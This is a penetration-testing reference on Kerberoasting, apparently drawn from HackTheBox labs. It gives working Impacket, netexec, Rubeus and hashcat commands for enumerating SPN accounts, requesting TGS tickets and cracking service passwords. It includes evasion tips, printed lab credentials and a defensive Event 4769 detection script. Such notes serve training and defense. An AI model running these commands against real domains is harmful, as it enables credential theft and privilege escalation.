# Kerberoasting

## Overview
Kerberoasting allows any authenticated domain user to request Ticket Granting Service (TGS) tickets for accounts that have a Service Principal Name (SPN). The service ticket inside the TGS-REP is encrypted with the service account's long-term key, which for RC4 is the account's NTLM password hash. By extracting the encrypted portion and cracking it offline, the service account's plaintext password can be recovered. This is one of the most reliable lateral movement techniques in Active Directory, because service accounts frequently have weak or default passwords and those passwords rarely change.
## Prerequisites
- A valid domain user account (any privilege level)
- Network access to the KDC on port 88
- A domain-joined or time-synchronized client
## Detection & Enumeration

### Manual SPN Discovery
```bash
# LDAP query for all enabled user accounts with SPNs
ldapsearch -x -H 'ldap://10.10.10.100' -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' \
  -b "dc=active,dc=htb" -s sub \
  "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" \
  serviceprincipalname | grep -B 1 servicePrincipalName

# Impacket GetUserSPNs (list SPNs without requesting TGS)
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100
# Output: SPN, account name, and group membership for each service account

# netexec: enumerates kerberoastable accounts, requests their tickets and writes the hashes to kerb.txt
netexec ldap 10.10.10.100 -u svc_tgs -p 'pass' --kerberoasting kerb.txt
```
### BloodHound Edge

In BloodHound, the Kerberoastable edge exists on any user with at least one SPN. After ingesting data, filter by "Find Kerberoastable Users" or use Cypher:

```cypher
MATCH (u:User {hasspn: true}) RETURN u.name, u.serviceprincipalnames
```
## Exploitation / Execution

### Standard Kerberoasting

```bash
# Request TGS tickets for all SPN accounts and output hashes
# -request: request and extract the TGS-REP hash
# -dc-ip: domain controller IP
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request
# Output: $krb5tgs$23$*<user>$<DOMAIN>$<spn>*$<hash>

# Save hashes to a file
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request -outputfile hashes.txt
```
### Targeted Kerberoasting (Request Weaker Encryption)

Some accounts are issued RC4-encrypted tickets when their SPN is requested individually for a specific user. This yields `$krb5tgs$23$` (RC4) instead of `$krb5tgs$18$` (AES256), which cracks much faster.

```bash
# Request TGS for a specific service account
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request-user Administrator

# Using netexec for targeted kerberoasting (-k: Kerberos authentication)
netexec ldap dc01.rebound.htb -u ldap_monitor -p '1GR8t@$$4u' -k --kerberoasting output.txt
```
### Kerberoasting from Windows

```powershell
# Rubeus kerberoast — all SPN accounts
Rubeus.exe kerberoast /nowrap

# Rubeus kerberoast — specific user
Rubeus.exe kerberoast /user:Administrator /nowrap

# Rubeus — request only RC4 tickets (faster cracking)
Rubeus.exe kerberoast /tgtdeleg /nowrap
```
### Pre-Authentication Kerberoasting (No Credentials)

If an AS-REP-roastable user (one with Kerberos pre-authentication disabled) exists, their TGT can be used to perform Kerberoasting without any valid credentials. This technique chains the AS-REP roasting and Kerberoasting attack paths.

```bash
# Requires the ThePorgs fork of Impacket with -no-preauth support
# First, get the AS-REP roastable user's username (e.g., jjones)
# Then use GetUserSPNs with -no-preauth
GetUserSPNs.py -no-preauth jjones -request -usersfile usernames.txt rebound.htb/ -dc-ip 10.10.11.231

# The fork must support -no-preauth (PR #1413 merged into some forks)
# Output will include both $krb5tgs$18$ and $krb5tgs$23$ tickets
# $krb5tgs$18$: AES256 encrypted — slower to crack
# $krb5tgs$23$: RC4 encrypted — faster to crack
```
## Hash Cracking

### Hash Formats

| Hash Prefix | Hashcat Mode | Encryption Type |
|---|---|---|
| `$krb5tgs$23$` | 13100 | RC4-HMAC (TGS-REP etype 23) |
| `$krb5tgs$18$` | 19700 | AES256-CTS (TGS-REP etype 18) |
| `$krb5tgs$17$` | 19600 | AES128-CTS (TGS-REP etype 17) |

```bash
# Hashcat mode 13100 — RC4 TGS-REP (most common)
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt --force --potfile-disable

# Hashcat mode 19700 — AES256 TGS-REP
hashcat -m 19700 hash /usr/share/wordlists/rockyou.txt --force

# John the Ripper — auto-detects format
john hash --wordlist=/usr/share/wordlists/rockyou.txt

# John with specific format
john hash --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt
```
### Cracking Strategies

```bash
# Strategy 1: RockYou first (fast)
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt --force

# Strategy 2: RockYou + best64 rule (good coverage)
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

# Strategy 3: SecLists copy of rockyou (combine with -r rules as in Strategy 2)
hashcat -m 13100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --force

# Strategy 4: Targeted wordlist based on company keywords
# Build a custom wordlist with CeWL or manual curation
```
### RC4 vs AES Ticket Differences

- RC4 (`$23$`): The key is the NT hash (MD4 of the password), used directly. Faster cracking at ~20M+ guesses/second.
- AES (`$18$`): The key is derived with PBKDF2 using 4096 iterations. Much slower cracking at ~200K guesses/second.
- Some environments enforce AES-only for service tickets. If all hashes are `$18$`, consider requesting tickets with the `-request-user` flag or using Rubeus, which may yield `$23$` tickets depending on the KDC configuration.
## Common Pitfalls

- No SPN accounts found: The domain may not have user service accounts with SPNs. Check for computer accounts (they have implicit SPNs, but their machine passwords are long and random, so they are not realistic cracking targets).
- All tickets are AES (`$18$`): RC4 may be disabled domain-wide. Cracking AES tickets is feasible but requires more targeted wordlists.
- Hashcat mode not found: Older hashcat versions may not support modes 19600/19700. Update hashcat or use john.
- KDC_ERR_S_PRINCIPAL_UNKNOWN: The SPN is not registered. Verify the target exists.
## OPSEC Considerations
- Each TGS request generates Event ID 4769 (Kerberos service ticket requested) on the DC
- These events are distinct from normal service ticket requests (different ticket options flags)
- The encryption type requested (RC4 vs AES) is logged — an unusual spike in RC4 requests is detectable
- Microsoft Defender for Identity (MDI) and ATA flag Kerberoasting traffic patterns
- Bulk Kerberoasting is noisy — prefer targeted requests for specific high-value service accounts
- BloodHound can identify Kerberoastable users without making any TGS requests (LDAP-only enumeration)
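The defender's side of the 4769 trail described above, as an added example that is not part of the original notes: it groups RC4 (0x17) service-ticket requests by requesting account, ignores computer accounts and krbtgt, and flags any account that pulls tickets for several distinct user SPN accounts inside a short window. The records and their field names are constructed to mirror the 4769 event fields; they are not a real log export.

```python
# Added example (not from the original notes): flag Kerberoasting-like bursts in
# Windows Security Event ID 4769 (service ticket requested) records. The records
# below are constructed and the dict keys are assumptions that mirror the 4769
# fields (TargetUserName, ServiceName, TicketEncryptionType, IpAddress).
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"              # TicketEncryptionType for RC4-HMAC (etype 23)
WINDOW = timedelta(minutes=5)  # sliding window per requesting account
THRESHOLD = 3                  # distinct RC4 user service tickets to raise an alert

# Constructed sample: svc_tgs pulls RC4 tickets for several user SPN accounts in
# two minutes; alice makes ordinary requests (AES to a computer, one RC4 ticket).
EVENTS = [
    {"time": "2024-05-01T10:00:01", "requester": "svc_tgs@ACTIVE.HTB", "service": "svc_sql", "etype": "0x17", "ip": "10.10.14.5"},
    {"time": "2024-05-01T10:00:02", "requester": "svc_tgs@ACTIVE.HTB", "service": "svc_http", "etype": "0x17", "ip": "10.10.14.5"},
    {"time": "2024-05-01T10:00:03", "requester": "svc_tgs@ACTIVE.HTB", "service": "svc_backup", "etype": "0x12", "ip": "10.10.14.5"},
    {"time": "2024-05-01T10:01:30", "requester": "svc_tgs@ACTIVE.HTB", "service": "Administrator", "etype": "0x17", "ip": "10.10.14.5"},
    {"time": "2024-05-01T10:01:45", "requester": "svc_tgs@ACTIVE.HTB", "service": "DC$", "etype": "0x17", "ip": "10.10.14.5"},
    {"time": "2024-05-01T10:00:10", "requester": "alice@ACTIVE.HTB", "service": "DC$", "etype": "0x12", "ip": "10.10.10.50"},
    {"time": "2024-05-01T10:03:00", "requester": "alice@ACTIVE.HTB", "service": "svc_http", "etype": "0x17", "ip": "10.10.10.50"},
]

def is_roast_candidate(ev):
    """RC4 ticket for a user account: computer accounts ($) and krbtgt are excluded,
    since their long random keys are not realistic offline-cracking targets."""
    svc = ev["service"]
    return ev["etype"].lower() == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt"

def detect_kerberoast(events, window=WINDOW, threshold=THRESHOLD):
    """Return {requester: sorted distinct RC4 service names} for each requester that
    obtained >= threshold distinct RC4 user service tickets within one window."""
    by_requester = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            by_requester[ev["requester"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    flagged = {}
    for who, reqs in by_requester.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            # every RC4 ticket this requester obtained within `window` of request i
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) >= threshold:
                flagged[who] = sorted(in_window)
                break
    return flagged

if __name__ == "__main__":
    for who, services in detect_kerberoast(EVENTS).items():
        print(f"possible Kerberoasting by {who}: {len(services)} RC4 tickets -> {', '.join(services)}")
```

Tune `THRESHOLD` and `WINDOW` to the baseline of the environment; a domain that still issues RC4 tickets routinely needs a higher threshold than one that is AES-only.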
## Post-Exploitation Value
- Service accounts frequently have elevated privileges — Domain Admin in the worst case (as in Active HTB where Administrator had an SPN)
- Service account passwords rarely change, providing long-term access
- A cracked service account can be used for further Kerberoasting via TGT delegation
- The service account NTLM hash can be used for Silver Ticket attacks
## Cross-References

### Tool References
| Tool | Link |
|---|---|
| Impacket (GetUserSPNs) | https://github.com/fortra/impacket |
| ThePorgs Impacket Fork | https://github.com/ThePorgs/impacket |
| Rubeus | https://github.com/GhostPack/Rubeus |
| hashcat | https://hashcat.net/hashcat/ |
| targetedKerberoast.py | https://github.com/ShutdownRepo/targetedKerberoast |
### Source Machines

- Active (Easy) — Administrator had an SPN (active/CIFS:445); cracked to Ticketmaster1968
- Rebound (Insane) — ldap_monitor SPN cracked to 1GR8t@$$4u; used pre-auth Kerberoasting via jjones' TGT